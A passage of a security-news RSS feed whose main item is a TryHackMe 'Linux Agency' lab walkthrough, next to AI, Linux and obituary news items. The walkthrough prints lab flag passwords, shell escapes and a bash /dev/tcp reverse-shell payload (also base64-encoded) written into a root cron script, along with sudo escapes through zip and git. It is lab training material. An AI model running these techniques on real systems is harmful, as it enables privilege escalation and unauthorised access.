href="https://infosecwriteups.com/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it-5d59c031e602">How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Xi Vows to Make AI for All in Debut at China's Top Tech Summit]]></title>
<description><![CDATA[Xi Jinping used his first appearance at China's World AI Conference to promote a vision of low-cost, broadly accessible AI and call for international cooperation rather than technological rivalry. "AI development should not be a solo performance by a single country, but a symphony of internationa...]]></description>
<link>https://tsecurity.de/de/3677104/it-security-nachrichten/xi-vows-to-make-ai-for-all-in-debut-at-chinas-top-tech-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677104/it-security-nachrichten/xi-vows-to-make-ai-for-all-in-debut-at-chinas-top-tech-summit/</guid>
<pubDate>Sat, 18 Jul 2026 00:05:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Xi Jinping used his first appearance at China's World AI Conference to promote a vision of low-cost, broadly accessible AI and call for international cooperation rather than technological rivalry. "AI development should not be a solo performance by a single country, but a symphony of international cooperation," he said. Bloomberg reports: His presence at the gathering, attended by scores of tech and government leaders, conveys a potent signal of China's ambitions to dominate a technological sphere with the potential to revolutionize industry and economies -- an effort that's shot to the top of the nation's agenda. Chinese models are winning over companies worldwide, with their share of US firms' AI usage nearing a record 60% on the popular marketplace OpenRouter.
 
Behind the rhetoric, Beijing is grappling with the balance between openness and national security as models grow more capable. Chinese officials recently discussed with companies including Alibaba -- developer of the popular Qwen models -- how to mitigate the security risks posed by their increasingly powerful models, people familiar with the matter said. The talks are early, with no enforcement planned, but restricting foreign access to top models was among the options raised, the people said. Reuters previously reported that Beijing was weighing curbs on overseas access. Earlier today, the Beijing-based AI company "Moonshot" released a massive new model that reset the AI race overnight, immediately vaulting into the top tier of global AI, beating Anthropic's Fable 5 and OpenAI's GPT-5.6 Sol in front-end coding tests.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Xi+Vows+to+Make+AI+for+All+in+Debut+at+China's+Top+Tech+Summit%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F17%2F1929216%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F17%2F1929216%2Fxi-vows-to-make-ai-for-all-in-debut-at-chinas-top-tech-summit%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/17/1929216/xi-vows-to-make-ai-for-all-in-debut-at-chinas-top-tech-summit?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Securing BPF LSMs against tampering]]></title>
<description><![CDATA[Since 2020, BPF programs have been able to

act as Linux security modules
(LSMs). Several projects, including systemd, have been working to use
that capability to provide more security to users. Christian Brauner
spoke at the 2026

Linux Storage, Filesystem, Memory-Management, and BPF Summit
abou...]]></description>
<link>https://tsecurity.de/de/3676692/linux-tipps/securing-bpf-lsms-against-tampering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676692/linux-tipps/securing-bpf-lsms-against-tampering/</guid>
<pubDate>Fri, 17 Jul 2026 19:27:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
Since 2020, BPF programs have been able to
<a href="https://docs.kernel.org/bpf/prog_lsm.html">
act as</a> Linux security modules
(LSMs). Several projects, including systemd, have been working to use
that capability to provide more security to users. Christian Brauner
spoke at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management, and BPF Summit</a>
about some of the limitations of using BPF in this way, and the changes he
would like to see for systemd's use. In particular, he would like a way to make
sure that BPF programs cannot be removed or have their private data tampered with.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-07-17 - Plasma, KDE Framework, COSMIC, Pipewire, Firefox]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may f...]]></description>
<link>https://tsecurity.de/de/3676482/unix-server/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676482/unix-server/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/</guid>
<pubDate>Fri, 17 Jul 2026 17:31:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-866692-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-866692-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-866692-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-866692-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">(click for more details)</a>
<h2><a name="p-866692-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-866692-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.8">1.6.8</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.6/releasenotes/">152.0.6</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.28.0/">6.28.0</a></li>
<li><strong>KDE Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.7.3/">6.7.3</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.3.0">1.3.0</a></li>
<li><strong>GStreamer</strong> <a href="https://gstreamer.freedesktop.org/releases/1.28/#1.28.5">1.28.5</a></li>
<li><strong>Wine</strong> <a href="https://www.winehq.org/news/2026071001">11.13</a></li>
</ul>
<h2><a name="p-866692-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-866692-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.177</li>
<li>linux66 6.6.144</li>
<li>linux612 6.12.95</li>
<li>linux618 6.18.38</li>
<li>linux71 7.1.3</li>
<li>linux72 7.2.0-rc3</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/17/26 15:26 CEST)</p>
<ul>
<li>testing core x86_64:  62 new and 62 removed package(s)</li>
<li>testing extra x86_64:  1486 new and 1584 removed package(s)</li>
<li>testing multilib x86_64:  13 new and 13 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://gist.githubusercontent.com/hphilm/20841c3d8f4f60c7bfbc2f2ca8f53b62/raw/c5bc9c08f504f55939e66ead30e0673fba85c544">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-07-17-plasma-kde-framework-cosmic-pipewire-firefox/189028">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Roger Summit, Who Invented an Early Online Search Service, Dies at 95]]></title>
<description><![CDATA[A research scientist at Lockheed, he came up with the idea for a computer system that would search scientific and technical literature almost instantaneously.]]></description>
<link>https://tsecurity.de/de/3676302/it-nachrichten/roger-summit-who-invented-an-early-online-search-service-dies-at-95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676302/it-nachrichten/roger-summit-who-invented-an-early-online-search-service-dies-at-95/</guid>
<pubDate>Fri, 17 Jul 2026 16:18:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A research scientist at Lockheed, he came up with the idea for a computer system that would search scientific and technical literature almost instantaneously.]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Linux Agency | Complete Write-Up & Walkthrough]]></title>
<description><![CDATA[“Agent 47, your mission begins. 30 targets stand between you and the root.”Author: Shikhali JamalzadeGitHub: github.com/alisaliveLinkedIn: linkedin.com/in/camalzads📋 Room OverviewPlatform TryHackMe Room Name Linux Agency Link https://tryhackme.com/room/linuxagency Difficulty Medium Category Linux...]]></description>
<link>https://tsecurity.de/de/3675298/hacking/tryhackme-linux-agency-complete-write-up-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675298/hacking/tryhackme-linux-agency-complete-write-up-walkthrough/</guid>
<pubDate>Fri, 17 Jul 2026 09:09:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KSkSbmZiLuuvwoZUpWjb2w.png"></figure><blockquote>“Agent 47, your mission begins. 30 targets stand between you and the root.”<br>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br>GitHub<strong>:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a><br>LinkedIn<strong>:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></blockquote><h3>📋 Room Overview</h3><p><strong>Platform</strong> TryHackMe <br><strong>Room Name</strong> Linux Agency <br><strong>Link</strong> <a href="https://tryhackme.com/room/linuxagency">https://tryhackme.com/room/linuxagency</a> <br><strong>Difficulty</strong> Medium <br><strong>Category</strong> Linux Fundamentals + Privilege Escalation <br><strong>Initial Access</strong> SSH (agent47)</p><h3>🎯 About This Room</h3><p><strong>Linux Agency</strong> is one of the most comprehensive Linux-focused rooms on TryHackMe. You play the role of <strong>Agent 47</strong> — a secret agent tasked with infiltrating the ICA Agency, chaining through <strong>30 mission accounts</strong>, eliminating special targets, and ultimately achieving <strong>root</strong>.</p><p>This room goes far beyond basic Linux commands — it forces you to think like a real penetration tester. Topics covered:</p><ul><li>🐧 Deep Linux fundamentals (hidden files, permissions, environment variables)</li><li>💻 Multiple programming languages (Python, Ruby, Java, C)</li><li>🔐 Encoding/decoding (Base64, Binary, Hex)</li><li>📅 Cron job exploitation</li><li>⚡ Sudo privilege escalation via GTFOBins</li><li>🐳 Docker privilege escalation</li><li>🔑 SSH private key cracking</li></ul><h3>🛠️ Tools Used</h3><ul><li>ssh, su, find, grep, cat, ls, strings, file</li><li>base64, xxd</li><li>gcc, javac, java, python3, ruby</li><li>netcat (nc)</li><li>ssh2john + john (John the Ripper)</li><li>ss (socket statistics)</li><li>GTFOBins</li><li>Docker</li></ul><h3>⚙️ Setup</h3><p>Start the machine on TryHackMe and wait about a minute. Then connect:</p><pre>ssh agent47@&lt;MACHINE_IP&gt;</pre><p><strong>Password:</strong> 640509040147</p><p>Once connected you’ll see:</p><pre>agent47@linuxagency:~$</pre><p>The mission begins. 🚀</p><h3>🗂️ Task 2: Initial Access</h3><p>The room’s mechanic is straightforward:</p><ul><li>Every flag found acts as the <strong>password</strong> for the next user</li><li>Flag format: missionX{md5_hash}</li><li>Chain: agent47 → mission1 → mission2 → ... → mission30 → viktor → ...</li></ul><h3>🔍 Task 3: Linux Fundamentals (Mission 1–30 + Viktor)</h3><h3>🎯 Mission 1</h3><p>As <strong>agent47</strong>, the first task is finding mission1’s flag.</p><pre>find / -type f -name "*.txt" 2&gt;/dev/null<br># Or directly check:<br>ls /home/mission1/<br>cat /home/mission1/&lt;flag_file&gt;</pre><p>Now switch to mission1:</p><pre>su mission1<br># Password: mission1{174dc8f191bcbb161fe25f8a5b58d1f0}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>find for filesystem-wide searching, understanding the </em><em>/home directory structure.</em></blockquote><h3>🎯 Mission 2</h3><p>As <strong>mission1</strong>:</p><pre>find / -type f -name "mission2" 2&gt;/dev/null<br>cat &lt;found_path&gt;</pre><pre>su mission2<br># Password: mission2{8a1b68bb11e4a35245061656b5b9fa0d}</pre><h3>🎯 Mission 3</h3><pre># As mission2:<br>grep -r "mission3" . 2&gt;/dev/null</pre><pre>su mission3<br># Password: mission3{ab1e1ae5cba688340825103f70b0f976}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>grep -r for recursive content searching across directories.</em></blockquote><h3>🎯 Mission 4</h3><pre># As mission3:<br>cd /home/mission3<br>ls<br>cat flag.txt</pre><pre>su mission4<br># Password: mission4{264a7eeb920f80b3ee9665fafb7ff92d}</pre><h3>🎯 Missions 5–8</h3><p>These follow a similar pattern — searching the filesystem:</p><pre># As mission4:<br>grep -r "mission5" / 2&gt;/dev/null<br>su mission5<br># Password: mission5{bc67906710c3a376bcc7bd25978f62c0}</pre><pre># As mission5:<br>grep -r "mission6" / 2&gt;/dev/null<br>su mission6<br># Password: mission6{1fa67e1adc244b5c6ea711f0c9675fde}</pre><pre># As mission6:<br>grep -r "mission7" / 2&gt;/dev/null<br>su mission7<br># Password: mission7{53fd6b2bad6e85519c7403267225def5}</pre><pre># As mission7:<br>grep -r "mission8" / 2&gt;/dev/null<br>su mission8<br># Password: mission8{3bee25ebda7fe7dc0a9d2f481d10577b}</pre><h3>🎯 Mission 9</h3><pre># As mission8:<br>ls<br>cat flag.txt</pre><pre>su mission9<br># Password: mission9{ba1069363d182e1c114bef7521c898f5}</pre><h3>🎯 Missions 10–11</h3><pre># As mission9:<br>grep -r "mission10" / 2&gt;/dev/null<br>su mission10<br># Password: mission10{0c9d1c7c5683a1a29b05bb67856524b6}</pre><pre># As mission10:<br>grep -r "mission11" / 2&gt;/dev/null<br>su mission11<br># Password: mission11{db074d9b68f06246944b991d433180c0}</pre><h3>🎯 Mission 12 — Environment Variable</h3><p>This time the flag is hidden inside an <strong>environment variable</strong>, not a file!</p><pre># As mission11:<br>env | grep mission12</pre><pre>su mission12<br># Password: mission12{f449a1d33d6edc327354635967f9a720}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>env command lists all environment variables. In real-world pentesting, environment variables frequently contain credentials, API keys, and sensitive data — always check them!</em></blockquote><h3>🎯 Mission 13 — File Permissions</h3><pre># As mission12:<br>ls -la /home/mission12/<br># flag.txt exists but you have no read permission!<br>chmod 777 /home/mission12/flag.txt<br>cat /home/mission12/flag.txt</pre><pre>su mission13<br># Password: mission13{076124e360406b4c98ecefddd13ddb1f}</pre><blockquote><strong>💡 What we learned:</strong><em> Linux file permissions and </em><em>chmod. Always use </em><em>ls -la — the </em><em>-a flag reveals hidden files and the </em><em>-l flag shows permissions clearly.</em></blockquote><h3>🎯 Mission 14 — Base64 Decode</h3><pre># As mission13:<br>cat /home/mission13/flag.txt | base64 -d</pre><pre>su mission14<br># Password: mission14{d598de95639514b9941507617b9e54d2}</pre><blockquote><strong>💡 What we learned:</strong><em> Base64 encoding/decoding. Strings ending with </em><em>= or </em><em>== are almost always Base64-encoded. The </em><em>base64 -d flag decodes them directly in the terminal.</em></blockquote><h3>🎯 Mission 15 — Binary → ASCII</h3><pre># As mission14:<br>cat /home/mission14/flag.txt<br># You'll see binary digits: 01101101 01101001 ...</pre><p>Convert the binary to ASCII using Python:</p><pre>python3 -c "<br>binary = '01101101 01101001 01110011 01110011 01101001 01101111 01101110 00110001 00110101'<br>chars = binary.split()<br>result = ''.join([chr(int(b, 2)) for b in chars])<br>print(result)<br>"</pre><p>Or use an online tool: <a href="https://www.rapidtables.com/convert/number/binary-to-ascii.html">https://www.rapidtables.com/convert/number/binary-to-ascii.html</a></p><pre>su mission15<br># Password: mission15{fc4915d818bfaeff01185c3547f25596}</pre><blockquote><strong>💡 What we learned:</strong><em> Binary → ASCII conversion. Recognizing encoding formats on sight is a key CTF skill.</em></blockquote><h3>🎯 Mission 16 — Hex → ASCII</h3><pre># As mission15:<br>cat /home/mission15/flag.txt | xxd -r -p</pre><p>xxd -r -p converts a raw hex string directly back to ASCII.</p><pre>su mission16<br># Password: mission16{884417d40033c4c2091b44d7c26a908e}</pre><blockquote><strong>💡 What we learned:</strong><em> Hex decoding. </em><em>xxd dumps hex (-p for plain hex), and with </em><em>-r it reverses the process.</em></blockquote><h3>🎯 Mission 17 — Execute Permission</h3><pre># As mission16:<br>ls -la /home/mission16/<br># There's a 'flag' binary but it has no execute permission<br>chmod u+x /home/mission16/flag<br>./flag</pre><pre>su mission17<br># Password: mission17{49f8d1348a1053e221dfe7ff99f5cbf4}</pre><h3>🎯 Mission 18 — Java</h3><pre># As mission17:<br>ls /home/mission17/<br># flag.java found<br>cd /home/mission17/<br>javac flag.java      # Compile<br>java flag            # Run</pre><pre>su mission18<br># Password: mission18{f09760649986b489cda320ab5f7917e8}</pre><blockquote><strong>💡 What we learned:</strong><em> Java compilation workflow: </em><em>javac compiles </em><em>.java → </em><em>.class, then </em><em>java runs the class.</em></blockquote><h3>🎯 Mission 19 — Ruby</h3><pre># As mission18:<br>ruby /home/mission18/flag.rb</pre><pre>su mission19<br># Password: mission19{a0bf41f56b3ac622d808f7a4385254b7}</pre><h3>🎯 Mission 20 — C Language</h3><pre># As mission19:<br>cd /home/mission19/<br>gcc flag.c -o flag   # Compile<br>./flag               # Run</pre><pre>su mission20<br># Password: mission20{b0482f9e90c8ad2421bf4353cd8eae1c}</pre><blockquote><strong>💡 What we learned:</strong><em> C compilation: </em><em>gcc source.c -o output_name then </em><em>./output_name to execute.</em></blockquote><h3>🎯 Mission 21 — Python</h3><pre># As mission20:<br>python3 /home/mission20/flag.py</pre><pre>su mission21<br># Password: mission21{7de756aabc528b446f6eb38419318f0c}</pre><h3>🎯 Mission 22 — Restricted Shell Escape (script)</h3><p>When you log in as <strong>mission21</strong>, you’re dropped into a restricted shell. Escape using:</p><pre>script -qc /bin/bash /dev/null</pre><p>This spawns a full bash shell. Now check .bashrc:</p><pre>cat ~/.bashrc<br># You'll find a Base64-encoded string<br>echo '&lt;base64_string&gt;' | base64 -d</pre><pre>su mission22<br># Password: mission22{24caa74eb0889ed6a2e6984b42d49aaf}</pre><blockquote><strong>💡 What we learned:</strong><em> Restricted shell escape using the </em><em>script command, which opens a new terminal session. Always check </em><em>.bashrc and </em><em>.bash_profile — attackers hide data there, and defenders do too.</em></blockquote><h3>🎯 Mission 23 — Python Interpreter Shell Escape</h3><p>Logging in as <strong>mission22</strong> drops you into a Python REPL. Escape to bash:</p><pre>import pty<br>pty.spawn("/bin/bash")</pre><p>Now read the flag:</p><pre>cat /home/mission22/flag.txt</pre><pre>su mission23<br># Password: mission23{3710b9cb185282e3f61d2fd8b1b4ffea}</pre><blockquote><strong>💡 What we learned:</strong><em> Python </em><em>pty.spawn() for shell escape — this is also a standard technique for upgrading dumb reverse shells to fully interactive TTYs in real engagements!</em></blockquote><h3>🎯 Mission 24 — Virtual Host + cURL</h3><pre># As mission23:<br>cat /home/mission23/message.txt<br>cat /etc/hosts<br># You'll see mission24.com mapped to 127.0.0.1<br>curl http://mission24.com -s | grep mission</pre><pre>su mission24<br># Password: mission24{dbaeb06591a7fd6230407df3a947b89c}</pre><blockquote><strong>💡 What we learned:</strong><em> Virtual hosting — the </em><em>/etc/hosts file acts as a local DNS resolver. In real engagements, always check </em><em>/etc/hosts for internal hostnames that reveal additional attack surface.</em></blockquote><h3>🎯 Mission 25 — Binary Analysis + viminfo</h3><pre># As mission24:<br>ls /home/mission24/<br>file bribe              # Check the file type<br>./bribe                 # Execute it — it writes to .viminfo<br>grep mission /home/mission24/.viminfo</pre><pre>su mission25<br># Password: mission25{61b93637881c87c71f220033b22a921b}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>file command identifies file types regardless of extension. </em><em>.viminfo is a hidden file storing Vim history — always run </em><em>ls -la to catch hidden files!</em></blockquote><h3>🎯 Mission 26 — PATH Manipulation</h3><p>Logging in as <strong>mission25</strong> gives you a broken environment — commands don’t work because $PATH is corrupted.</p><pre>echo $PATH<br># Empty or wrong PATH</pre><pre>export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin<br>ls -lhA<br>cat flag.txt</pre><pre>su mission26<br># Password: mission26{cb6ce977c16c57f509e9f8462a120f00}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>$PATH environment variable defines where the shell looks for executables. This concept is the foundation of PATH hijacking attacks — one of the most common Linux PrivEsc vectors.</em></blockquote><h3>🎯 Mission 27 — Steganography with strings</h3><pre># As mission26:<br>ls /home/mission26/<br>strings -n 20 /home/mission26/flag.jpg</pre><p>strings extracts human-readable strings from binary files. -n 20 filters results to strings of at least 20 characters.</p><pre>su mission27<br># Password: mission27{444d29b932124a48e7dddc0595788f4d}</pre><blockquote><strong>💡 What we learned:</strong><em> Basic steganography — data hidden inside image files. </em><em>strings is a quick first step when analyzing any binary or media file during a CTF or real engagement.</em></blockquote><h3>🎯 Mission 28 — Absurdly Long Filename</h3><pre># As mission27:<br>ls /home/mission27/<br>less flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz</pre><p>Yes, the filename is exactly that long. less handles it fine.</p><pre>su mission28<br># Password: mission28{03556f8ca983ef4dc26d2055aef9770f}</pre><h3>🎯 Mission 29 — Ruby Interpreter + Reverse String</h3><p>Logging in as <strong>mission28</strong> drops you into a Ruby REPL.</p><p><strong>Option 1 — Escape to shell:</strong></p><pre>exec "/bin/bash"</pre><p><strong>Option 2 — Read the file directly from Ruby:</strong></p><pre>Dir.chdir("/home/mission28")<br>puts File.open("txt.galf").readlines</pre><p>The flag is written in reverse! You’ll see something like:</p><pre>'}1fff2ad47eb52e68523621b8d50b2918{92noissim'</pre><p>Reverse it:</p><pre>'}1fff2ad47eb52e68523621b8d50b2918{92noissim'.reverse</pre><pre>su mission29<br># Password: mission29{8192b05d8b12632586e25be74da2fff1}</pre><blockquote><strong>💡 What we learned:</strong><em> Ruby interpreter escape. String reversal is a common obfuscation technique in CTFs. Also notice the filename </em><em>txt.galf — that's </em><em>flag.txt reversed!</em></blockquote><h3>🎯 Mission 30 — Bludit CMS Enumeration</h3><pre># As mission29:<br>ls /home/mission29/<br>grep -rn "mission30" /home/mission29/bludit/</pre><p>The flag is buried inside Bludit CMS’s file structure.</p><pre>su mission30<br># Password: mission30{d25b4c9fac38411d2fcb4796171bda6e}</pre><h3>🎯 Viktor — Git History</h3><pre># As mission30:<br>ls /home/mission30/<br>cd /home/mission30/Escalator/<br>git --no-pager log</pre><p>Browse the git commit history — the flag is hidden in there.</p><pre>su viktor<br># Password: viktor{b52c60124c0f8f85fe647021122b3d9a}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>git log reveals commit history. In real-world pentesting, exposed git repositories are a goldmine — credentials, API keys, and internal logic are frequently committed and never properly removed.</em></blockquote><h3>🔓 Task 4: Privilege Escalation</h3><p>You’re now <strong>viktor</strong>. The “special targets” phase begins — each user requires a different privilege escalation technique.</p><h3>🎯 Dalia — Cron Job Exploitation</h3><pre># As viktor:<br>cat /etc/crontab</pre><p>Output:</p><pre>* * * * * root bash /opt/scripts/47.sh</pre><p>Root runs /opt/scripts/47.sh every minute. Check the script and your permissions:</p><pre>cat /opt/scripts/47.sh<br>ls -la /opt/scripts/47.sh<br># You have write access!</pre><p><strong>Step 1:</strong> Create your reverse shell payload:</p><pre>vim /tmp/eop.sh</pre><p>Contents:</p><pre>#!/bin/bash<br>bash -i &gt;&amp; /dev/tcp/127.0.0.1/9999 0&gt;&amp;1</pre><p><strong>Step 2:</strong> Base64-encode it and overwrite the cron script:</p><pre>cat /tmp/eop.sh | base64 -w 0<br># Copy the output, then:<br>echo 'IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx' | base64 -d &gt; /opt/scripts/47.sh</pre><p><strong>Step 3:</strong> Set up your listener:</p><pre>nc -nlvp 9999</pre><p>Wait up to 60 seconds. The cron job fires and you get a shell as <strong>dalia</strong>:</p><pre># In the received shell:<br>id<br># uid=1000(dalia) ...<br>cat /home/dalia/flag.txt</pre><p><strong>Upgrade the shell (important for stability):</strong></p><pre>python3 -c 'import pty;pty.spawn("/bin/bash")'<br>export TERM=xterm<br>export SHELL=bash<br># Press Ctrl+Z<br>stty raw -echo; fg</pre><p>Flag: dalia{4a94a7a7bb4a819a63a33979926c77dc}</p><blockquote><strong>💡 What we learned:</strong><em> Cron job exploitation — one of the most common Linux PrivEsc vectors in the wild. The checklist: find writable scripts executed by root → inject reverse shell → wait. Always enumerate </em><em>/etc/crontab, </em><em>/etc/cron.d/, and </em><em>/var/spool/cron/.</em></blockquote><h3>🎯 Silvio — sudo + zip (GTFOBins)</h3><pre># As dalia:<br>sudo -l<br># (dalia) NOPASSWD: /usr/bin/zip as silvio</pre><p>From GTFOBins — zip sudo escape:</p><pre>TF=$(mktemp -u)<br>sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'</pre><pre>id<br># uid=... (silvio)<br>cat /home/silvio/flag.txt</pre><p>Flag: silvio{657b4d058c03ab9988875bc937f9c2ef}</p><blockquote><strong>💡 What we learned:</strong><em> </em><a href="https://gtfobins.github.io/"><em>GTFOBins</em></a><em> — the essential reference for abusing binaries with sudo, SUID, or capabilities. When you see </em><em>sudo -l, immediately cross-reference every allowed binary against GTFOBins.</em></blockquote><h3>🎯 Reza — sudo + git (GTFOBins)</h3><pre># As silvio:<br>sudo -l<br># (silvio) NOPASSWD: /usr/bin/git as reza</pre><p>GTFOBins git sudo escape (uses PAGER environment variable):</p><pre>sudo -u reza PAGER='sh -c "exec sh 0&lt;&amp;1"' git -p help</pre><pre>id<br># uid=... (reza)<br>cat /home/reza/flag.txt</pre><p>Flag: reza{2f1901644eda75306f3142d837b80d3e}</p><blockquote><strong>💡 What we learned:</strong><em> Git’s </em><em>--paginate (</em><em>-p) feature invokes a pager, and by hijacking the </em><em>PAGER env variable we execute arbitrary commands. Many programs that invoke external processes are susceptible to this pattern.</em></blockquote><h3>🎯 Jordan — PYTHONPATH Hijacking</h3><pre># As reza:<br>sudo -l<br># (reza) 